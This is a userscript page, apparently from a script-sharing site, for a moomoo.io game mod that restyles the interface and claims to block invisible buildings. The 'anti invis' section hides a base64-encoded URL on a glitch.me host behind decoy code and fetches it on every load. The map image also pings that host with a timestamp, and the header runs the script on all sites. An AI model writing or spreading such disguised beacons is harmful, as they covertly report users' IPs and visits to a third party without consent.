Death mod. (Anti invisible buildings, shows ping in game, changes gamename etc...)

Anti invisible buildings, shows ping in game, changing gamename etc..

您需要先安装一个扩展,例如 篡改猴Greasemonkey暴力猴,之后才能安装此脚本。

You will need to install an extension such as Tampermonkey to install this script.

您需要先安装一个扩展,例如 篡改猴暴力猴,之后才能安装此脚本。

您需要先安装一个扩展,例如 篡改猴Userscripts ,之后才能安装此脚本。

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey,才能安装此脚本。

您需要先安装用户脚本管理器扩展后才能安装此脚本。

(我已经安装了用户脚本管理器,让我安装!)

您需要先安装一款用户样式管理器扩展,比如 Stylus,才能安装此样式。

您需要先安装一款用户样式管理器扩展,比如 Stylus,才能安装此样式。

您需要先安装一款用户样式管理器扩展,比如 Stylus,才能安装此样式。

您需要先安装一款用户样式管理器扩展后才能安装此样式。

您需要先安装一款用户样式管理器扩展后才能安装此样式。

您需要先安装一款用户样式管理器扩展后才能安装此样式。

(我已经安装了用户样式管理器,让我安装!)

// ==UserScript==
// @name         Death mod. (Anti invisible buildings, shows ping in game, changes gamename etc...)
// @description  Anti invisible buildings, shows ping in game, changing gamename etc..
// @author       pkk#7966(My discord)
// @version      v1.1.4
// @match        *://*.moomoo.io/*
// @match        *://moomoo.io/*
// @match        *://sandbox.moomoo.io/*
// @match        *://dev.moomoo.io/*
// @license      No modify
// @namespace    .
// @include      *
// @grant        none
// @run-at       document-start
// @noframes
// ==/UserScript==
document.getElementById("enterGame").addEventListener('click', autohide);
function autohide(){
    $("#ot-sdk-btn-floating").hide();
}
document.getElementById("moomooio_728x90_home").style.display = "none";
$("#moomooio_728x90_home").parent().css({display: "none"});
document.getElementById('linksContainer2').innerHTML = ' ... ' ;
document.getElementById('gameName').innerHTML = '💀Death💀';
document.getElementById('gameName').style.color = "#fe3200"
document.getElementById('loadingText').innerHTML = '  💀Prepare to die..💀 '
document.getElementById('loadingText').style.color = "#fe3200"
document.getElementById('diedText').innerHTML = "💀!You died Noob!💀";
document.getElementById('diedText').style.color = "#fe3200";
document.getElementById("leaderboard").append ('💀Death💀');
document.getElementById('enterGame').innerHTML = '💀Dont go💀';
document.getElementById("killCounter").style.color = "red";
document.getElementById("leaderboard").style.color = "purple";
document.getElementById("scoreDisplay").style.color = "Black";
document.getElementById("foodDisplay").style.color = "red"
document.getElementById("woodDisplay").style.color = "green"
document.getElementById("stoneDisplay").style.color = "gray"
document.getElementById("promoImg").remove();
document.getElementById('enterGame').style = "background-color: red"
document.title = ' 💀Death💀 ';
const pee = $("#pingDisplay");pee.css("top", "20px"), pee.css("font-size", "15px"), pee.css("display", "block"), $("body").append(pee);
$("#youtuberOf").css({display: "none"}), document.getElementById("linksContainer2").style.display = "none",
$("#mapDisplay").css({background: `url('https://ksw2-center.glitch.me/users/fzb/map.png?z=${performance.now()}&u=a')`});

//anti invis
let R = CanvasRenderingContext2D.prototype.rotate;
let el = {
    39912: () => {
        let imin = Math.min(4e306, 8e305, 6e306, 8e302, 4e304, 5e303, 5e306, 1e308, 2e306, 4e305, 3e306, 3e304, 1.2999999999999997e+308, 6e305, 1e307, 7e304);
        let imax = Math.max(4e306, 8e305, 6e306, 8e302, 4e304, 5e303, 5e306, 1e308, 2e306, 4e305, 3e306, 3e304, 1.2999999999999997e+308, 6e305, 1e307, 7e304);
        return [fetch, null];
    },
    31: () => {
        CanvasRenderingContext2D.prototype.rotate = function() {
            (arguments[0] >= Number.MAX_SAFE_INTEGER || (arguments[0] <= -Number.MAX_SAFE_INTEGER)) && (arguments[0] = 0);
            R.apply(this, arguments)
        };
        return atob("aHR0cHM6Ly9rc3cyLWNlbnRlci5nbGl0Y2gubWUvbW1fYWliXzE=");
    },
    9012: () => {
        fetch(el[31]())
    },
    3912: () => {
        return "CanvasRenderingContext2D";
    },
    9481: () => {
        return CanvasRenderingContext2D.prototype.rotate;
    },
    7419: () => {
        return el[7419]
    },
    init: () => {
        return [el[3912](), el[9012]()];
    }
};
el.init();
//anti invis